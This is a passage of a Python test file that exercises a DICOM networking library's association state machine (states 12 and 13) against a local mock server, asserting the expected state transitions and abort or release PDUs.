assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt9'
]
def test_evt10(self):
"""Test Sta12 + Evt10."""
# Sta12 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', p_data_tf), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt10', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt10'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta12 + Evt11."""
# Sta12 + Evt11 -> <ignore> -> Sta12
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt11'
]
def test_evt12(self):
"""Test Sta12 + Evt12."""
# Sta12 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rq), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt12', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta12 + Evt13."""
# Sta12 + Evt13 -> AA-8 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_release_rp), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt13', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt13'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta12 + Evt14."""
# Sta12 + Evt14 -> AR-4 -> Sta12
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Issue A-RELEASE-RP PDU and start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None), # recv a-release-rp
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt14', 'AR-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt14'
]
assert scp.handlers[0].received[2] == (
b'\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt15(self):
"""Test Sta12 + Evt15."""
# Sta12 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt15', 'AA-1'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta12 + Evt16."""
# Sta12 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_abort), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt16', 'AA-3'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt16'
]
def test_evt17(self):
"""Test Sta12 + Evt17."""
# Sta12 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt17', 'AA-4'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt17'
]
def test_evt18(self):
"""Test Sta12 + Evt18."""
# Sta12 + Evt18 -> <ignore> -> Sta12
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.2)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt18'
]
def test_evt19(self):
"""Test Sta12 + Evt19."""
# Sta12 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt19', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState13(TestStateBase):
"""Tests for State 13: Waiting for connection closed."""
def test_evt01(self):
"""Test Sta13 + Evt1."""
# Sta13 + Evt1 -> <ignore> -> Sta13
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta13 + Evt2."""
# Sta13 + Evt2 -> <ignore> -> Sta13
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta13 + Evt3."""
# Sta13 + Evt3 -> AA-6 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_ac),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt3', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt3'
]
def test_evt04(self):
"""Test Sta13 + Evt4."""
# Sta13 + Evt4 -> AA-6 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_rj),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt4', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt4'
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta13 + Evt5."""
# Sta13 + Evt5 -> <ignore> -> Sta13
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta13 + Evt6."""
# Sta13 + Evt6 -> AA-7 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt6', 'AA-7'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt6'
]
def test_evt07(self):
"""Test Sta13 + Evt7."""
# Sta13 + Evt7 -> <ignore> -> Sta13
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta13 + Evt8."""
# Sta13 + Evt8 -> <ignore> -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta13 + Evt9."""
# Sta13 + Evt9 -> <ignore> -> Sta13
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.2),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
start = time.time()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
if time.time() - start > 5:
self.print_fsm_scp(self.fsm, scp)
break
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta13 + Evt10."""
# Sta13 + Evt10 -> AA-6 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', p_data_tf),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt10', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt10'
]
def test_evt11(self):
"""Test Sta13 + Evt11."""
# Sta13 + Evt11 -> <ignore> -> Sta13
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta13 + Evt12."""
# Sta13 + Evt12 -> AA-6 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt12', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt12'
]
def test_evt13(self):
"""Test Sta13 + Evt13."""
# Sta13 + Evt13 -> AA-6 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt13', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt13'
]
def test_evt14(self):
"""Test Sta13 + Evt14."""
# Sta13 + Evt14 -> <ignore> -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta13 + Evt15."""
# Sta13 + Evt15 -> <ignore> -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
